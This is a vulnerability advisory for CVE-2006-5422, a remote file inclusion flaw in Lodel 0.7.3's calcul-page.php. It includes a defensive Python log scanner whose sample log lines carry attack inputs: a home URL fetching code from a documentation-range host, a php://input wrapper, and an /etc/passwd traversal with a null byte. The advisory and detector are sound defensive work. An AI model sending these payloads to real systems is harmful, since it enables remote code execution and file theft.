CVE-2006-5422 in Lodel

Summary

by MITRE

PHP remote file inclusion vulnerability in calcul-page.php in Lodel (patchlodel) 0.7.3 allows remote attackers to execute arbitrary PHP code via a URL in the home parameter.

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Analysis

by VulDB Data Team • 04/25/2026

The vulnerability identified as CVE-2006-5422 represents a critical remote file inclusion flaw in Lodel version 0.7.3, specifically within the calcul-page.php script. This issue falls under the category of insecure direct object references and improper input validation, creating a pathway for malicious actors to execute arbitrary code on affected systems. The vulnerability manifests when the application fails to properly validate or sanitize user-supplied input passed through the home parameter, allowing attackers to inject malicious URLs that are subsequently included and executed as PHP code.

The technical exploitation of this vulnerability occurs through the manipulation of the home parameter in the calcul-page.php script, where the application directly incorporates user-provided URLs without adequate sanitization measures. This flaw aligns with CWE-98, which describes improper control of code generation capabilities, and CWE-20, which addresses insecure input handling in web applications. Attackers can leverage this vulnerability by crafting malicious URLs that point to remote servers hosting malicious PHP payloads, effectively bypassing local security controls and gaining unauthorized execution privileges on the target system.

The operational impact of this vulnerability extends beyond simple code execution, as it provides attackers with the ability to establish persistent access to affected systems, potentially leading to complete system compromise. The remote nature of the attack means that exploitation can occur from anywhere on the internet without requiring physical access or prior authentication. This vulnerability directly maps to ATT&CK technique T1190, which covers exploitation of remote services, and T1059, which addresses execution through command and scripting interpreters. The attack chain typically involves initial reconnaissance to identify vulnerable systems, followed by crafting malicious payloads that are injected through the home parameter to achieve remote code execution.

Organizations running Lodel 0.7.3 systems face significant risks including data theft, system takeover, and potential lateral movement within network environments. The vulnerability's classification as a remote code execution flaw makes it particularly dangerous as it can be exploited by automated scanning tools, leading to widespread compromise of vulnerable installations. Mitigation strategies should include immediate patching of the Lodel application to version 0.7.4 or later, which contains the necessary fixes for this vulnerability. Additionally, implementing input validation controls, disabling remote file inclusion features, and employing web application firewalls can provide defense-in-depth measures. The remediation process should also involve thorough network monitoring to detect potential exploitation attempts and comprehensive vulnerability assessments to identify other potentially affected systems within the organization's infrastructure.
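The analysis above describes the flaw (a URL passed in the `home` parameter of calcul-page.php is handed to a PHP include) and the defender's response (strict input validation plus monitoring for exploitation attempts). The following Python script is an added example and is not VulDB's or the Lodel project's code: it applies the allow-list rule a hardened calcul-page.php would need to each `home` value, and runs that rule over a handful of constructed Apache-style access-log lines to surface inclusion attempts. The log format, the allow-listed layout names (`default`, `alt`) and every address in the sample lines are assumptions for the demonstration; the real Lodel layout names are not on the advisory page.

```python
"""Flag PHP remote-file-inclusion attempts against calcul-page.php in web logs.

Added example for the CVE-2006-5422 advisory; not part of VulDB's or Lodel's code.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Schemes and PHP stream wrappers that turn include() into a fetch of remote or
# attacker-supplied code. A layout name never starts with one of these.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps", "php", "data", "expect", "phar")

# Constructed allow-list of layout names calcul-page.php may include.
# Assumption: Lodel's real layout names are not on the advisory page; a
# deployment would list its own here.
ALLOWED_HOMES = frozenset({"default", "alt"})

# Apache/nginx combined log format (assumed); only the fields needed are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_home(raw):
    """Classify one raw home= value the way a hardened calcul-page.php should.

    Only an exact allow-list match is 'ok'; every other value is rejected, and
    the label tells the analyst what kind of value was seen.
    """
    # Decode once more so a double-encoded value cannot slip past the scheme check.
    value = unquote(raw).strip()
    lowered = value.lower()
    if any(lowered.startswith(scheme + ":") for scheme in REMOTE_SCHEMES):
        return "remote"      # URL or wrapper: the CVE-2006-5422 pattern
    if any(ch in value for ch in ("/", "\\", "\x00")) or ".." in value:
        return "traversal"   # local-file inclusion / null-byte variants
    if value in ALLOWED_HOMES:
        return "ok"
    return "unknown"         # no attack signature, but not an allowed layout either


def scan_access_log(lines):
    """Return one finding per request to calcul-page.php whose home= is not allowed."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/calcul-page.php"):
            continue
        # keep_blank_values so an empty 'home=' is still seen and rejected
        for home in parse_qs(parts.query, keep_blank_values=True).get("home", []):
            verdict = classify_home(home)
            if verdict != "ok":
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "home": home, "verdict": verdict})
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2006:10:12:01 +0000] "GET /lodel/calcul-page.php?home=default HTTP/1.0" 200 4120',
    '198.51.100.7 - - [19/Oct/2006:10:12:09 +0000] "GET /lodel/calcul-page.php?home=http://203.0.113.5/x.txt HTTP/1.0" 200 88',
    '198.51.100.7 - - [19/Oct/2006:10:12:11 +0000] "GET /lodel/calcul-page.php?home=HTTP%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.0" 200 88',
    '198.51.100.8 - - [19/Oct/2006:10:13:40 +0000] "GET /lodel/calcul-page.php?home=php://input HTTP/1.0" 500 0',
    '198.51.100.8 - - [19/Oct/2006:10:13:45 +0000] "GET /lodel/calcul-page.php?home=../../../../etc/passwd%00 HTTP/1.0" 200 1303',
    '192.0.2.11 - - [19/Oct/2006:10:14:02 +0000] "GET /lodel/index.php?home=http://203.0.113.5/x.txt HTTP/1.0" 200 2200',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} home={f['home']!r} -> {f['verdict']}")
```

Two points in the design carry over to the server-side fix. First, the check is an allow-list of known layout names, not a deny-list of URL prefixes: a deny-list would have to keep up with every wrapper PHP supports, while an allow-list rejects anything that is not a known layout, including the `unknown` class that the scanner reports separately so it can be reviewed rather than ignored. Second, validating the parameter complements, but does not replace, the platform control the advisory calls "disabling remote file inclusion features", which in PHP is the `allow_url_include` directive (Off by default since PHP 5.2.0).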

Reservation

10/19/2006

Disclosure

10/20/2006

Moderation

accepted

Entry

VDB-32873

CPE

ready

EPSS

0.02671

KEV

no

Activities

very low

Sources
